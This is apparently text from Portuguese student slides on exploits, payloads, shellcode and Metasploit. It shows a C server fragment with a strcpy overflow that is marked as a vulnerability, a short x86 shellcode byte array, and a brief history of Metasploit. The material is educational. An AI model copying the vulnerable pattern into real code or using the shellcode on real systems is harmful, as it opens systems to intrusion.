apresentação exploit

COMPLEXIDADE DE ALGORITMOSProfessor Edson Lima

DENIS VIEIRANONDAS JUNIOR

EXPLOIT

Exploit, Payload e Shellcode

listen(Sock, 1);while(1){ Tam = sizeof(struct sockaddr_in); if((Novo=accept(Sock, (struct sockaddr *)&Cliente,&Tam))==1) exit(1); memset(Mens,0,strlen(Mens)); if(read(Novo,Mens,sizeof(Mens)) < 0) exit(2); TrataMensagem(Mens); close(Novo);}void TrataMensagem(char *Mens){ char Buffer[256]; strcpy(Buffer,Mens); /* VULNERABILIDADE: caso Mens seja maior que

256, haverá o estouro*/ }

unsigned char cod[]={0xeb,0x1f,0x90,0x90,0x90,0x90,0x5e,0x31,0xc0,0x88,0x46,0x07,0x89,0xf3,0xb0,0x08,0xb9,0xff,0xf1,0xff,0xff,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80,0x90,0x90,0x90,0x90,0xe8,0xe0,0xff,0xff,0xff,0};

Shellcode

Program.exe param1, pram2, cod

ARMITAGE – MSFCONSOLE - MFSCL

O metasploit e ferramenta utilizada em grande escala por profissionais de

segurança. Desenvolvido por HD Moore especialista em segurança,

teve sua primeira versão escrita em Perl e lançada em Outubro de 2003,

a versão 2.0 de Abril de 2004 reescrita em Ruby contava com 19 exploits e alguns payloads. Em 2009, a empresa Rapid7

adquire o projeto Metasploit e a ferramenta ganha força da comunidade envolvida em segurança da informação.

ARMITAGE

MSFCONSOLE

MFSCL

Conficker

RPC DCOM